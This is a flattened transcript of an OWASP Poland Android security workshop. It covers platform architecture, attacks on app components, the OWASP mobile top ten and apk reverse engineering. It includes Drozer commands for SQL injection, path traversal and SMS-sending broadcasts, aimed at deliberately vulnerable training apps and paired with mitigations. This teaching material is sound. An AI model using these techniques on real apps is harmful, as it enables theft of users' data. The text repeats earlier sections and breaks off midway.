[wroclaw #1] android security workshop
TRANSCRIPT
Android security workshop
OWASP Poland24022016
Agenda
Android fundamentals Application components security Coffee break (free cookies ) OWASP top 10 mobile risks Reverse engineering amp malware analysis
Android fundamentals
Andrii SygidaOWASP Poland24022016
Agendabull Android Architecturebull Android security fundamentalsbull Android 60 security releasebull Google security features
Introbull Android is the worlds most popular mobile platformFeaturesbull Multi-taskingbull Widgetsbull Notificationsbull Voice Typing and Actionsbull Photos and videobull Most widely used smartphone OSbull Phones tablets Google TV and more
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Agenda
Android fundamentals Application components security Coffee break (free cookies ) OWASP top 10 mobile risks Reverse engineering amp malware analysis
Android fundamentals
Andrii SygidaOWASP Poland24022016
Agendabull Android Architecturebull Android security fundamentalsbull Android 60 security releasebull Google security features
Introbull Android is the worlds most popular mobile platformFeaturesbull Multi-taskingbull Widgetsbull Notificationsbull Voice Typing and Actionsbull Photos and videobull Most widely used smartphone OSbull Phones tablets Google TV and more
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
